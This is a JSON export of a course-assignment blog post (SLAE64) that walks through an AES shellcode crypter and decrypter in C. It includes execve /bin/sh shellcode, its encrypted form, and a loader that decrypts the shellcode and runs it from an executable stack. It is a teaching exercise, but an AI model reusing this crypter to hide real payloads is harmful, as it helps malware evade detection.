{"id":219,"date":"2018-02-25T11:40:50","date_gmt":"2018-02-25T10:40:50","guid":{"rendered":"http:\/\/pentester.blog\/?p=219"},"modified":"2019-08-18T19:48:44","modified_gmt":"2019-08-18T17:48:44","slug":"slae64-assignment-7-custom-shellcode-crypter","status":"publish","type":"post","link":"https:\/\/hacktarus.fr\/?p=219","title":{"rendered":"SLAE64 – Assignment #7 – Custom Shellcode Crypter"},"content":{"rendered":"

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :<\/p>\n

http:\/\/www.securitytube-\u00adtraining.com\/online-\u00adcourses\/x8664-\u00adassembly-\u00adand-\u00adshellcoding-\u00adon-\u00adlinux\/index.html<\/p>\n

Student ID: PA-6470<\/p>\n

Assignment #7<\/h2>\n

The aim of this assignment is to create a custom crypter for shellcodes.<\/p>\n

Crypter<\/h2>\n

I’ve chose to use the AES encryption using mcrypt library (apt-get install libmcrypt-dev)<\/p>\n

https:\/\/gist.github.com\/bricef\/2436364<\/p>\n

1) First you need to dump the shellcode opcodes :<\/p>\n

for i in $(objdump -d Execve-Stack |grep \"^ \" |cut -f2); do echo -n '\\x'$i; done;echo<\/pre>\n
\"\"<\/p>\n
2) Then put these opcodes into the crypter code<\/p>\n
unsigned char shellcode[] = \"\\x48\\x31\\xc0\\x50\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x53\\x48\\x89\\xe7\\x50\\x48\\x89\\xe2\\x57\\x48\\x89\\xe6\\x48\\x83\\xc0\\x3b\\x0f\\x05\";<\/pre>\n
3) Then, compile crypter (don’t forget the -lmcrypt option) :<\/p>\n
gcc aes-shellcode-crypter.c -lmcrypt -o aes-shellcode-crypter<\/pre>\n
4) Finally, encrypt the shellcode using a symetric key and get the encrypted shellcode<\/p>\n
.\/aes-shellcode-crypter \"0123456789abcdef\"<\/pre>\n
\"\"<\/p>\n
Decrypter<\/h2>\n
1) Put the encrypted opcodes into the decrypter :<\/p>\n
unsigned char encrypted_shellcode[] = \"\\xca\\x8a\\x85\\xae\\xb4\\x1c\\xe4\\x8d\\x99\\x24\\xd0\\x09\\xaf\\x56\\x4b\\x54\\x1d\\xb0\\xce\\xa5\\xc0\\xe3\\x99\\x4d\\x31\\x5a\\x2d\\x28\\xed\\x1e\\x9a\\x28\";<\/pre>\n
2) Compile the decrypter<\/p>\n
gcc -fno-stack-protector -z execstack -lmcrypt aes-shellcode-decrypter.c -o aes-shellcode-decrypter<\/pre>\n
3) Decrypt and run the shellcode by using the same symetric key :<\/p>\n
.\/aes-shellcode-decrypter \"0123456789abcdef\"<\/pre>\n
\"\"<\/h2>\n
Full source code is available here and on my\u00a0Github<\/a>\u00a0account.<\/p>\n
aes-shellcode-crypter.c<\/h2>\n
\/*\r\n * Compile : gcc aes-shellcode-crypter.c -lmcrypt -o aes-shellcode-crypter\r\n *\r\n * Author : SLAE64-PA-6470 (kahlon81)\r\n * Date : 2018\/02\/21\r\n *\/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n\/*\r\n * MCrypt API available online:\r\n * http:\/\/linux.die.net\/man\/3\/mcrypt\r\n *\/\r\n#include <mcrypt.h>\r\n\r\n#include <math.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n\r\nint encrypt(\r\n    void* buffer,\r\n    int buffer_len, \/* Because the plaintext could include null bytes*\/\r\n    char* IV,\r\n    char* key,\r\n    int key_len\r\n){\r\n  MCRYPT td = mcrypt_module_open(\"rijndael-128\", NULL, \"cbc\", NULL);\r\n  int blocksize = mcrypt_enc_get_block_size(td);\r\n  if( buffer_len % blocksize != 0 ){return 1;}\r\n\r\n  mcrypt_generic_init(td, key, key_len, IV);\r\n  mcrypt_generic(td, buffer, buffer_len);\r\n  mcrypt_generic_deinit (td);\r\n  mcrypt_module_close(td);\r\n\r\n  return 0;\r\n}\r\n\r\nint decrypt(\r\n    void* buffer,\r\n    int buffer_len,\r\n    char* IV, \r\n    char* key,\r\n    int key_len \r\n){\r\n  MCRYPT td = mcrypt_module_open(\"rijndael-128\", NULL, \"cbc\", NULL);\r\n  int blocksize = mcrypt_enc_get_block_size(td);\r\n  if( buffer_len % blocksize != 0 ){return 1;}\r\n\r\n  mcrypt_generic_init(td, key, key_len, IV);\r\n  mdecrypt_generic(td, buffer, buffer_len);\r\n  mcrypt_generic_deinit (td);\r\n  mcrypt_module_close(td);\r\n\r\n  return 0;\r\n}\r\n\r\nvoid display_hex(char* cipher, int len) {\r\n  int v;\r\n  for (v=0; v<len; v++)\r\n    \/\/printf(\"\\\\x%2hhX\", cipher[v]);\r\n    printf(\"\\\\x%02x\", cipher[v] & 0xff);\r\n  printf(\"\\n\");\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n  MCRYPT td, td2;\r\n  unsigned char shellcode[] = \"\\x48\\x31\\xc0\\x50\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x53\\x48\\x89\\xe7\\x50\\x48\\x89\\xe2\\x57\\x48\\x89\\xe6\\x48\\x83\\xc0\\x3b\\x0f\\x05\";\r\n  unsigned char *plaintext = shellcode;\r\n  char* IV = \"AAAAAAAAAAAAAAAA\";\r\n  char* buffer;\r\n  int buffer_len = strlen(plaintext);\r\n\r\n  \/\/ check param\r\n  if (argc != 2) {\r\n    printf(\"Usage : .\/aes-shellcode-crypter <128 bits encryption key>\\n\");\r\n    printf(\"Example : .\/aes-shellcode-crypter 0123456789abcdef\\n\");\r\n    exit(-1);\r\n  }\r\n\r\n  \/\/ input key\r\n  char *key = (char *)argv[1];\r\n  int keysize = strlen(key);\r\n\r\n  buffer = calloc(1, buffer_len);\r\n  strncpy(buffer, plaintext, buffer_len);\r\n\r\n  printf(\"plain size=%d:\\n\", strlen(plaintext));\r\n  display_hex(plaintext, strlen(plaintext));\r\n\r\n  encrypt(buffer, buffer_len, IV, key, keysize); \r\n\r\n  printf(\"cipher size=%d:\\n\", strlen(buffer));\r\n  display_hex(buffer, buffer_len);\r\n\r\n  decrypt(buffer, buffer_len, IV, key, keysize);\r\n\r\n  printf(\"decrypt size=%d:\\n\", strlen(buffer));\r\n  display_hex(buffer, buffer_len);\r\n\r\n  return 0;\r\n}<\/pre>\n
aes-shellcode-decrypter.c<\/h2>\n
\/*\r\n * Compile : gcc -fno-stack-protector -z execstack -lmcrypt aes-shellcode-decrypter.c -o aes-shellcode-decrypter\r\n *\r\n * Author : SLAE64-PA-6470 (kahlon81)\r\n * Date : 2018\/02\/21\r\n *\/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n\/*\r\n * MCrypt API available online:\r\n * http:\/\/linux.die.net\/man\/3\/mcrypt\r\n *\/\r\n#include <mcrypt.h>\r\n\r\n#include <math.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n\r\nint encrypt(\r\n    void* buffer,\r\n    int buffer_len, \/* Because the plaintext could include null bytes*\/\r\n    char* IV,\r\n    char* key,\r\n    int key_len\r\n){\r\n  MCRYPT td = mcrypt_module_open(\"rijndael-128\", NULL, \"cbc\", NULL);\r\n  int blocksize = mcrypt_enc_get_block_size(td);\r\n  if( buffer_len % blocksize != 0 ){return 1;}\r\n\r\n  mcrypt_generic_init(td, key, key_len, IV);\r\n  mcrypt_generic(td, buffer, buffer_len);\r\n  mcrypt_generic_deinit (td);\r\n  mcrypt_module_close(td);\r\n\r\n  return 0;\r\n}\r\n\r\nint decrypt(\r\n    void* buffer,\r\n    int buffer_len,\r\n    char* IV, \r\n    char* key,\r\n    int key_len \r\n){\r\n  MCRYPT td = mcrypt_module_open(\"rijndael-128\", NULL, \"cbc\", NULL);\r\n  int blocksize = mcrypt_enc_get_block_size(td);\r\n  if( buffer_len % blocksize != 0 ){return 1;}\r\n\r\n  mcrypt_generic_init(td, key, key_len, IV);\r\n  mdecrypt_generic(td, buffer, buffer_len);\r\n  mcrypt_generic_deinit (td);\r\n  mcrypt_module_close(td);\r\n\r\n  return 0;\r\n}\r\n\r\nvoid display_hex(char* cipher, int len) {\r\n  int v;\r\n  for (v=0; v<len; v++)\r\n    \/\/printf(\"\\\\x%2hhX\", cipher[v]);\r\n    printf(\"\\\\x%02x\", cipher[v] & 0xff);\r\n  printf(\"\\n\");\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n  MCRYPT td, td2;\r\n  unsigned char encrypted_shellcode[] = \"\\xca\\x8a\\x85\\xae\\xb4\\x1c\\xe4\\x8d\\x99\\x24\\xd0\\x09\\xaf\\x56\\x4b\\x54\\x1d\\xb0\\xce\\xa5\\xc0\\xe3\\x99\\x4d\\x31\\x5a\\x2d\\x28\\xed\\x1e\\x9a\\x28\";\r\n  unsigned char *encrypted = encrypted_shellcode;\r\n  char* IV = \"AAAAAAAAAAAAAAAA\";\r\n  char* buffer;\r\n  int buffer_len = strlen(encrypted);\r\n  int (*sc)();\r\n\r\n  \/\/ check param\r\n  if (argc != 2) {\r\n    printf(\"Usage : .\/aes-shellcode-decrypter <128 bits encryption key>\\n\");\r\n    printf(\"Example : .\/aes-shellcode-decrypter 0123456789abcdef\\n\");\r\n    exit(-1);\r\n  }\r\n\r\n  \/\/ input key\r\n  char *key = (char *)argv[1];\r\n  int keysize = strlen(key);\r\n\r\n  printf(\"encrypt size=%d:\\n\", strlen(encrypted));\r\n  display_hex(encrypted, strlen(encrypted));\r\n\r\n  buffer = calloc(1, buffer_len);\r\n  strncpy(buffer, encrypted, buffer_len);\r\n\r\n  decrypt(buffer, buffer_len, IV, key, keysize);\r\n\r\n  printf(\"decrypt size=%d:\\n\", strlen(buffer));\r\n  display_hex(buffer, buffer_len);\r\n\r\n  sc = (int(*)())buffer;\r\n  sc();\r\n\r\n  return 0;\r\n}<\/pre>\n","protected":false},"excerpt":{"rendered":"
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification : http:\/\/www.securitytube-\u00adtraining.com\/online-\u00adcourses\/x8664-\u00adassembly-\u00adand-\u00adshellcoding-\u00adon-\u00adlinux\/index.html Student ID: PA-6470 Assignment #7 The aim of this assignment is to create a custom crypter for shellcodes. Crypter I’ve chose to use the AES encryption using mcrypt library (apt-get install libmcrypt-dev) https:\/\/gist.github.com\/bricef\/2436364 1) First you … Continuer la lecture de SLAE64 – Assignment #7 – Custom Shellcode Crypter<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-219","post","type-post","status-publish","format-standard","hentry","category-slae64"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/219","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=219"}],"version-history":[{"count":6,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/219\/revisions"}],"predecessor-version":[{"id":300,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/219\/revisions\/300"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=219"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=219"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=219"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}